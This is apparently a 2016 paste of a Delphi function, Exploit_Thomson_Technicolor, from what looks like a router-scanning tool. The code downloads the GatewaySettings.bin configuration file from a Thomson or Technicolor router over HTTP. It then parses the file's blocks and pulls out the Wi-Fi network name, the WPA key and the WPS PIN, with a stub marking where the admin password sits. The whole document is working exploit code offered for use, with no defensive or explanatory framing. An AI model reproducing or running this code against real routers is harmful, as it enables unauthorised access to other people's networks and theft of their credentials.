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a guest
May 16th, 2016
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  1. // References:
  2. //
  4. function TRouter.Exploit_Thomson_Technicolor(UseAuth: Boolean; var AuthUser, AuthPass: String): Boolean;
  5. var
  6. Code: Integer;
  7. MS: TMemoryStream;
  8. dw, off: DWord;
  9. w: Word;
  10. Found: Boolean;
  12. function SearchBlock(Src: TMemoryStream; Name: AnsiString; var Off: DWord;
  13. var Sz: Word): Boolean;
  14. var
  15. A: Array[0..3] of AnsiChar;
  16. begin
  17. Result := False;
  18. while Src.Position < Src.Size do begin
  19. Off := Src.Position;
  20. Src.ReadBuffer(w, 2);
  21. Sz := SwapEndian(w);
  22. Src.ReadBuffer(A[0], 4);
  23. Src.Seek(-6, soCurrent);
  24. if A = Name then begin
  25. Result := True;
  26. Exit;
  27. end;
  28. Src.Seek(Sz, soCurrent);
  29. end;
  30. end;
  31. begin
  32. // Affected:
  33. // Technicolor (many)
  34. // Thomson (many)
  35. Result := False;
  36. if ServerName <> '' then
  37. Exit;
  38. if AuthOk and (AuthUser = 'admin') then
  39. Exit;
  40. MS := TMemoryStream.Create;
  41. if GetHTTPStream('http://'+IPToStr(IP)+':'+IntToStr(Port)+'/GatewaySettings.bin',
  42. MS, Code, 5, 0, ServerName, False, AuthUser, AuthPass) then
  43. if MS.Size > 256 then begin
  44. MS.Seek($5A, soFromBeginning);
  45. MS.ReadBuffer(dw, 4);
  46. dw := SwapEndian(dw);
  47. if dw = $10000 then begin
  48. MS.Seek($5E, soFromBeginning);
  49. MS.ReadBuffer(w, 2);
  50. w := SwapEndian(w);
  51. if w = MS.Size - $10 then begin
  52. Found := SearchBlock(MS, '8021', off, w);
  53. if Found and (w >= $22E) then begin
  54. SSID := PAnsiChar(Cardinal(MS.Memory) + off + 8);
  55. SetTableCell(stcSSID, SSID);
  56. Pasw := PAnsiChar(Cardinal(MS.Memory) + off + $174);
  57. SetTableCell(stcKey, Pasw);
  58. Pin := PAnsiChar(Cardinal(MS.Memory) + off + $225);
  59. SetTableCell(stcPin, Pin);
  60. end;
  61. {Found := SearchBlock(MS, 'WiGu', off, w);
  62. if Found and (w >= $C1) then begin
  63. LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $B9)^)+
  64. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BA)^)+
  65. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BB)^)+
  66. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BC)^);
  67. SetTableCell(stcLANIP, LAN);
  68. LAN := IntToStr(PByte(Cardinal(MS.Memory) + off + $BD)^)+
  69. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BE)^)+
  70. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $BF)^)+
  71. '.' + IntToStr(PByte(Cardinal(MS.Memory) + off + $C0)^);
  72. SetTableCell(stcLANMask, LAN);
  73. end;}
  74. Found := SearchBlock(MS, 'UPC.', off, w);
  75. if Found and (w >= $C1) then begin
  76. // admin password somewhere here
  77. end;
  78. end;
  79. end;
  80. end;
  81. MS.Free;
  82. end;
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